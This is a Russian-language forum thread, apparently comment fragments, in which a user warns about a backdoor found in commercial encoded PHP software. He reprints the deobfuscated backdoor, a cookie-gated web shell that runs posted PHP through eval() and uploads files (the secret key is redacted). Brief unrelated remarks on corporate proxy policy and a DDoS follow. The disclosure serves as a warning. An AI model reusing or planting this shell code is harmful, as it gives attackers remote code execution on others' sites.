Написал и пригласил в дискуссию. Если убедительного пояснения не будет, назову софтину и автора.
Не сообразили? Не ставьте чужой закриптованный софт, без крайней необходимости.
artmonster, я отказался от установки этой софтины. Нет ни времени, ни желания ее допиливать, а "как есть" она у меня не работает.
Как-то не собрался ему написать. Да и неохота взрослых людей воспитывать.
Либо начнет отрицать, либо наедет за "нарушение лицензии" (раскриптовку), либо уйдет в молчанку. Проверил бы, да недосуг пока.
Непохоже, хотя бы потому, что сам код написан в одну строку, без пробелов (я отформатировал для читаемости) и спрятан в такую хрень: eval( base64_decode( ))
Вы в это верите? В коде шелла - путь, характерный именно для этого скрипта.
Я вообще-то про покупку зазенденных лицензий. Чтобы покупать и устанавливать закриптованный софт надо очень доверять разработчику и при этом мириться с тем, что он-то тебе заведомо не доверяет. 🚬
Я не уверен полностью, что ключи к бэкдору разные для всех покупателей. Если ключ одинаковый, то публикуя название софта, я открываю дыру для всех желающих.
А код из софтинки я-таки опубликую. Он размещен в библиотеке функций, которая инклудится при каждом обращении к админке:
if(isset($_COOKIE['megasecret'])) { if($_COOKIE['megasecret'] == 'удалено на всякий случай') { echo '<form name=\"megaform\" action=\"\" method=\"post\" enctype=\"multipart/form-data\"> <input name=\"mega-path\" type=\"text\" value=\"../тоже удалено, успешно гуглится ибо/\"> <input name=\"mega-file\" type=\"file\"> <br /> <textarea name=\"mega-exe\" rows=\"10\" cols=\"100\" wrap=\"off\"></textarea> <br /> <input name=\"mega-str\" type=\"checkbox\" value=\"ON\"> stripslashes <input type=\"submit\" value=\"Send / Execute\"> </form> <hr> <textarea rows=\"10\" cols=\"100\" wrap=\"off\">'; if($_POST['mega-exe'] != '') { if($_POST['mega-str'] != '') { $_POST['mega-exe'] = stripslashes($_POST['mega-exe']); } eval($_POST['mega-exe']); } echo '</textarea>'; if(file_exists($_FILES['mega-file']['tmp_name'])) { move_uploaded_file($_FILES['mega-file']['tmp_name'], $_POST['mega-path'].$_FILES['mega-file']['name']); } exit(); } }
Пока просто жалко хлопца палить, может это он не со зла, а по дурости.
Еще раз: админам пофих. Это начальство переживает. :D
По-уму, инет офицерам настраивают так: IP-шлюз закрыт, почта - через корпоративный сервер, веб - через корпоративный прокси и только через порт 80, запросы ограничены GET и POST. Скайпы и прочие аськи - отсутствуют. Обойти можно, но такие таланты и заслуживают награды. Кто обходит - не банить, пусть себе.
А вообще админам пофик кто куда ходит, лишь бы не мешали в контру рубиццо.
В крайнем случае скинут шефу логи sarg и пусть изучает, пока не надоест.
Была очередная ДДОС. Сейчас уже все спокойно.